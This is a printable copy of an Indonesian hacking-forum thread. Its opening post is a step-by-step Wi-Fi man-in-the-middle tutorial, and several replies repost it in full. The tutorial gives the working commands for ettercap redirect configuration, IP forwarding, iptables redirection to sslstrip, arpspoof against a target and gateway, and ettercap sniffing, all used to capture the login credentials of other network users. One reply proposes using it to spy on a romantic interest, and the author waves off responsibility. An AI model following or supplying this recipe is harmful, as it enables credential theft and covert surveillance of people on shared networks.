BackBox Indonesia
Melihat Username dan Password Pengguna Jaringan Wifi - Printable Version

+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Wireless Kungfu (https://www.backboxindonesia.or.id/forum-16.html)
+--- Thread: Melihat Username dan Password Pengguna Jaringan Wifi (/thread-114.html)



Melihat Username dan Password Pengguna Jaringan Wifi - Nue Bhandell - 04-29-2016

awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13105789_783858338415188_779337003_o.png...e=5729604B]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13106738_783858388415183_732244936_o.png...e=57298D69]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13113135_783858408415181_2082658609_o.pn...e=57297DD7]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13120598_783858421748513_1984075421_o.pn...e=57296374]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13120790_783858541748501_1281277873_o.pn...e=5729B50A]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR


RE: Melihat Username dan Password Pengguna Jaringan Wifi - koboi - 04-29-2016

(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13120586_783857848415237_969346868_o.png...e=5725BEA7]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13091868_783857881748567_485575617_o.png...e=57250997]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13090708_783857885081900_895853354_o.png...e=572507D9]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13090768_783857921748563_753369840_o.png...e=5725BA25]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13091574_783858021748553_122467338_o.png...e=5724B2AB]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

Nice one (y)


RE: Melihat Username dan Password Pengguna Jaringan Wifi - Nue Bhandell - 04-29-2016

(04-29-2016, 04:35 AM)koboi Wrote:
(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13120586_783857848415237_969346868_o.png...e=5725BEA7]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13091868_783857881748567_485575617_o.png...e=57250997]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13090708_783857885081900_895853354_o.png...e=572507D9]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13090768_783857921748563_753369840_o.png...e=5725BA25]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13091574_783858021748553_122467338_o.png...e=5724B2AB]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

Nice one (y)

tengkyuuhh om hehehe


RE: Melihat Username dan Password Pengguna Jaringan Wifi - teh - 04-29-2016

test on kang, lmayan buat kepo si doi hihihi


RE: Melihat Username dan Password Pengguna Jaringan Wifi - owl - 05-02-2016

(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13120586_783857848415237_969346868_o.png...e=5725BEA7]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13091868_783857881748567_485575617_o.png...e=57250997]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13090708_783857885081900_895853354_o.png...e=572507D9]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13090768_783857921748563_753369840_o.png...e=5725BA25]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13091574_783858021748553_122467338_o.png...e=5724B2AB]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

nice kang


RE: Melihat Username dan Password Pengguna Jaringan Wifi - Nue Bhandell - 05-02-2016

(04-29-2016, 08:15 AM)teh Wrote: test on kang, lmayan buat kepo si doi hihihi

hehehe, silahkan, selebihnya jadi tanggung jawab masing2 yoo akwkaw

(05-02-2016, 03:21 AM)owl Wrote:
(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13120586_783857848415237_969346868_o.png...e=5725BEA7]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13091868_783857881748567_485575617_o.png...e=57250997]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13090708_783857885081900_895853354_o.png...e=572507D9]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13090768_783857921748563_753369840_o.png...e=5725BA25]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13091574_783858021748553_122467338_o.png...e=5724B2AB]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

nice kang

tengkyuh om